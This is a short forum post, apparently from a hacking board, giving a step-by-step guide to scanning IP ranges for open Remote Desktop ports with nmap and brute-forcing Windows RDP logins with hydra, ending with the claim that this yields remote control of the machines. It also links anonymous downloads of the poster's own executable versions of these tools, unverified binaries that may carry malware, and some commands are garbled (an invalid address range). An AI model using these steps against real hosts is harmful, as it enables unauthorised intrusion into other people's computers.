Autor Tema: WINDOWS VPS BRUTE FORCE- REMOTE DESKTOP PROTOCOL  (Leído 790 veces)

0 Usuarios y 1 Visitante están viendo este tema.

nmap

  • Mensajes: 3
  • Liked: 0
WINDOWS VPS BRUTE FORCE- REMOTE DESKTOP PROTOCOL
« : octubre 03, 2018, 05:22:26 am »
- LINUX
Need:
-nmap
-hydra

New in linux?:

This tools runs in linux terminal, you can use Termux or Userland in your phone,

its a linux terminal but dont have sudo (big problem) userland have sudo but its not stable.

nmap comands:

nnmap 179.239.123.1/43 (this its the range, you can change it) -p3389 ( port 3389 its predeterminated port to RDP)

Example:

nmap 179.239.123/12 -p 3389

run it, and look witch host its up and with por open.

Firts part done.

 

Second part HYDRA to brute force:

Its ease you need a (user.txt) (pass.txt) and your target, or your ip targets (ip.txt) you can put the name you want.

And put this comand

hydra -L user.txt -P pass.txt -u  -t 4 -W 2  170.150.160.12 rdp

*t its threads

*W its time to wait

*rdp its the protocol

 
When you have have it your ip + user + pass you have the remote control of all PC.


WINDOWS - SAME PROCESS

If you dont have any linux pc anyway you can try it my own C++ version of nmap and hydra, its stable but not like real.

NMAP C++

https://anonfile.com/u5sfzdidbc/Nmap_v4.1_C_exe
 
HYDRA C++

https://anonfile.com/D8sbz1iebe/Hydra_C_exe

 

thks, bye